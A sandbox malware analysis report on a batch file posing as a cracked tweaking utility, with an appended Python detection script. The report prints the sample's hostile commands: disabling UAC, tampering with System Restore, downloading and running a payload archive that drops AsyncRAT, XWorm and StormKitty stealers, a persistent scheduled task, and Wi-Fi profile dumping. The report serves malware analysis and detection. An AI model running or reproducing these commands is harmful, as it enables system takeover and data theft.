Malware Analysis Report

2025-01-03 06:16

Sample ID 241124-ytw56asqgn
Target EXM_Premium_Tweaking_Utility_1.0_Cracked.bat
SHA256 16431cc14917abeb316e0bc44045440a8f86b7ac4fdd0dce99de6435d493ecca
Tags
asyncrat stormkitty xworm default discovery evasion execution persistence privilege_escalation rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

16431cc14917abeb316e0bc44045440a8f86b7ac4fdd0dce99de6435d493ecca

Threat Level: Known bad

The file EXM_Premium_Tweaking_Utility_1.0_Cracked.bat was found to be: Known bad.

Malicious Activity Summary

asyncrat stormkitty xworm default discovery evasion execution persistence privilege_escalation rat spyware stealer trojan

Detect Xworm Payload

AsyncRat

Asyncrat family

UAC bypass

StormKitty payload

Stormkitty family

Xworm family

Xworm

StormKitty

Async RAT payload

Reads user/profile data of web browsers

Checks computer location settings

Drops startup file

Executes dropped EXE

Looks up external IP address via web service

Drops desktop.ini file(s)

Looks up geolocation information via web service

Legitimate hosting services abused for malware hosting/C2

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Enumerates physical storage devices

Browser Information Discovery

Event Triggered Execution: Netsh Helper DLL

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Checks processor information in registry

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-24 20:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-24 20:05

Reported

2024-11-24 20:06

Platform

win10v2004-20241007-en

Max time kernel

67s

Max time network

67s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stormkitty family

stormkitty

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Xworm

trojan rat xworm

Xworm family

xworm

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\exm\EXMservice.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk C:\Users\Admin\msedge.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk C:\Users\Admin\msedge.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\exm\EXMservice.exe N/A
N/A N/A C:\Users\Admin\msedge.exe N/A
N/A N/A C:\Users\Admin\svchost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini C:\Users\Admin\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini C:\Users\Admin\svchost.exe N/A
File created C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini C:\Users\Admin\svchost.exe N/A
File created C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\svchost.exe N/A
File created C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\svchost.exe N/A
File created C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini C:\Users\Admin\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini C:\Users\Admin\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini C:\Users\Admin\svchost.exe N/A
File created C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini C:\Users\Admin\svchost.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A icanhazip.com N/A N/A

Looks up geolocation information via web service

Browser Information Discovery

discovery

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\svchost.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\msedge.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1492 wrote to memory of 3096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 3096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 3928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 3928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 1340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 4024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 4024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 2988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1492 wrote to memory of 2988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2988 wrote to memory of 4140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2988 wrote to memory of 4140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2988 wrote to memory of 60 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2988 wrote to memory of 60 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1492 wrote to memory of 4380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1492 wrote to memory of 4380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1492 wrote to memory of 5044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1492 wrote to memory of 5044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1492 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1492 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1492 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 3928 N/A C:\Windows\system32\cmd.exe C:\exm\EXMservice.exe
PID 1492 wrote to memory of 3928 N/A C:\Windows\system32\cmd.exe C:\exm\EXMservice.exe
PID 3928 wrote to memory of 1412 N/A C:\exm\EXMservice.exe C:\Users\Admin\msedge.exe
PID 3928 wrote to memory of 1412 N/A C:\exm\EXMservice.exe C:\Users\Admin\msedge.exe
PID 3928 wrote to memory of 1872 N/A C:\exm\EXMservice.exe C:\Users\Admin\svchost.exe
PID 3928 wrote to memory of 1872 N/A C:\exm\EXMservice.exe C:\Users\Admin\svchost.exe
PID 3928 wrote to memory of 1872 N/A C:\exm\EXMservice.exe C:\Users\Admin\svchost.exe
PID 1492 wrote to memory of 4024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1492 wrote to memory of 4024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1412 wrote to memory of 4732 N/A C:\Users\Admin\msedge.exe C:\Windows\System32\schtasks.exe
PID 1412 wrote to memory of 4732 N/A C:\Users\Admin\msedge.exe C:\Windows\System32\schtasks.exe
PID 1872 wrote to memory of 2524 N/A C:\Users\Admin\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 2524 N/A C:\Users\Admin\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 2524 N/A C:\Users\Admin\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 2524 wrote to memory of 5000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2524 wrote to memory of 5000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2524 wrote to memory of 5000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2524 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2524 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2524 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2524 wrote to memory of 4040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2524 wrote to memory of 4040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2524 wrote to memory of 4040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1872 wrote to memory of 5064 N/A C:\Users\Admin\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 5064 N/A C:\Users\Admin\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 5064 N/A C:\Users\Admin\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 5064 wrote to memory of 3292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 5064 wrote to memory of 3292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 5064 wrote to memory of 3292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 5064 wrote to memory of 1656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 5064 wrote to memory of 1656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 5064 wrote to memory of 1656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1492 wrote to memory of 5072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1492 wrote to memory of 5072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1492 wrote to memory of 3108 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 3108 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 3316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1492 wrote to memory of 3316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat"

C:\Windows\system32\reg.exe

Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f

C:\Windows\system32\reg.exe

Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'

C:\Windows\system32\reg.exe

Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\CONSOLE" /v "VirtualTerminalLevel" /t REG_DWORD /d "1" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_UserAccount where name="Admin" get sid | findstr "S-"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_UserAccount where name="Admin" get sid

C:\Windows\system32\findstr.exe

findstr "S-"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\chcp.com

chcp 437

C:\Windows\system32\curl.exe

curl -g -k -L -# -o "C:\Users\Admin\AppData\Local\Temp\exm.zip" "https://github.com/anonyketa/EXM-Tweaking-Utility-Premium/releases/download/V1.0/exm.zip"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile Expand-Archive 'C:\Users\Admin\AppData\Local\Temp\exm.zip' -DestinationPath 'C:\Exm\'

C:\exm\EXMservice.exe

EXMservice.exe

C:\Users\Admin\msedge.exe

"C:\Users\Admin\msedge.exe"

C:\Users\Admin\svchost.exe

"C:\Users\Admin\svchost.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\chcp.com

chcp 437

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& {Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('ONLY DO THESE ON ETHERNET, WIFI TWEAKS COMING IN 1.0', 'Exm Tweaking Utility', 'Ok', [System.Windows.Forms.MessageBoxIcon]::Information);}"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\timeout.exe

timeout 2
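The Processes section above records the whole chain: the .bat turns off UAC and System Restore through reg.exe, pulls exm.zip from a GitHub release with curl, expands it with PowerShell, runs EXMservice.exe, which drops msedge.exe and svchost.exe into the user profile; the dropped msedge.exe then registers a one-minute scheduled task at the highest run level while svchost.exe dumps Wi-Fi profiles through netsh. The following is an added example, not part of the sandbox output, showing how those command lines would be matched by process-creation rules over Sysmon-style events. The event records are constructed from the tables in this report (PIDs and parent links taken from the WriteProcessMemory table, plus one benign Edge launch as a control); the rule names are my own and the ATT&CK technique IDs are the ones this behaviour is normally mapped to.

```python
"""Process-creation rules for the chain in this report, run over constructed
Sysmon-style events (assumed layout; not the sandbox's own data model)."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample: command lines copied from the Processes section, PIDs from
# the WriteProcessMemory table; the last event is a benign control, not from the report.
SAMPLE_EVENTS = [
    ProcEvent(1492, 1000, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat"'),
    ProcEvent(3096, 1492, r"C:\Windows\system32\reg.exe",
              r'Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f'),
    ProcEvent(4024, 1492, r"C:\Windows\system32\reg.exe",
              r'Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f'),
    ProcEvent(2980, 1492, r"C:\Windows\system32\curl.exe",
              r'curl -g -k -L -# -o "C:\Users\Admin\AppData\Local\Temp\exm.zip" "https://github.com/anonyketa/EXM-Tweaking-Utility-Premium/releases/download/V1.0/exm.zip"'),
    ProcEvent(4780, 1492, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -NoProfile Expand-Archive 'C:\Users\Admin\AppData\Local\Temp\exm.zip' -DestinationPath 'C:\Exm\'"),
    ProcEvent(3928, 1492, r"C:\exm\EXMservice.exe", "EXMservice.exe"),
    ProcEvent(1412, 3928, r"C:\Users\Admin\msedge.exe", r'"C:\Users\Admin\msedge.exe"'),
    ProcEvent(1872, 3928, r"C:\Users\Admin\svchost.exe", r'"C:\Users\Admin\svchost.exe"'),
    ProcEvent(4732, 1412, r"C:\Windows\System32\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"'),
    ProcEvent(4772, 2524, r"C:\Windows\SysWOW64\netsh.exe", "netsh wlan show profile"),
    ProcEvent(6000, 1000, r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
              r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"'),  # benign control
]

# Directories from which a binary named like a Windows/Edge component is expected to run.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                "c:\\program files\\", "c:\\program files (x86)\\")
SYSTEM_NAMES = {"svchost.exe", "msedge.exe", "explorer.exe", "lsass.exe", "csrss.exe", "winlogon.exe"}


def _name(path):
    return path.rsplit("\\", 1)[-1].lower()


def _has(cmd, *needles):
    c = cmd.lower()
    return all(n.lower() in c for n in needles)


# (rule name, ATT&CK technique, predicate) - each predicate keys on the command line
# as logged, not on whether the command succeeded.
RULES = [
    ("uac_disabled_via_reg", "T1548.002",
     lambda e: _name(e.image) == "reg.exe" and _has(e.cmdline, "policies\\system", "enablelua")
     and re.search(r'/d\s+"?0"?(\s|$)', e.cmdline, re.I) is not None),
    ("system_restore_tampering", "T1490",
     lambda e: _name(e.image) == "reg.exe" and _has(e.cmdline, "systemrestore")),
    ("schtasks_minute_highest", "T1053.005",
     lambda e: _name(e.image) == "schtasks.exe" and _has(e.cmdline, "/create", "/sc minute", "/rl highest")),
    ("wifi_profile_dump", "T1016.002",
     lambda e: _name(e.image) == "netsh.exe" and _has(e.cmdline, "wlan show")),
    ("curl_archive_to_temp", "T1105",
     lambda e: _name(e.image) == "curl.exe" and _has(e.cmdline, "-o", "\\temp\\", ".zip")),
    ("expand_archive_from_temp", "T1059.001",
     lambda e: _name(e.image) == "powershell.exe" and _has(e.cmdline, "expand-archive", "\\temp\\")),
    ("system_binary_name_outside_trusted_dir", "T1036.005",
     lambda e: _name(e.image) in SYSTEM_NAMES and not e.image.lower().startswith(TRUSTED_DIRS)),
]


def detect(events):
    """Return (rule, technique, pid, image) for every event that matches a rule."""
    hits = []
    for e in events:
        for name, tech, pred in RULES:
            if pred(e):
                hits.append((name, tech, e.pid, e.image))
    return hits


def ancestry(events, pid):
    """Walk parent links back to the root so a hit can be tied to the originating .bat."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


if __name__ == "__main__":
    for rule, tech, pid, image in detect(SAMPLE_EVENTS):
        print(f"{tech:10} {rule:40} pid={pid:<5} {' <- '.join(ancestry(SAMPLE_EVENTS, pid))}")
```

Run stand-alone it prints one line per hit with the ancestry back to the cmd.exe that launched the .bat, and leaves the control Edge launch alone. Two of the rules, `wifi_profile_dump` and `expand_archive_from_temp`, also fire on routine administration, so in production they belong scoped by parent (here the netsh parent is a cmd.exe spawned by an svchost.exe living in C:\Users\Admin) rather than alerting on their own. Note also that the two Reg.exe delete commands in this report address HKLM\SOFTWARE\Microsoft\WindowsNT without the space in "Windows NT", so they cannot have removed anything; the rule keys on the SystemRestore value name and does not depend on the command having succeeded.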

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
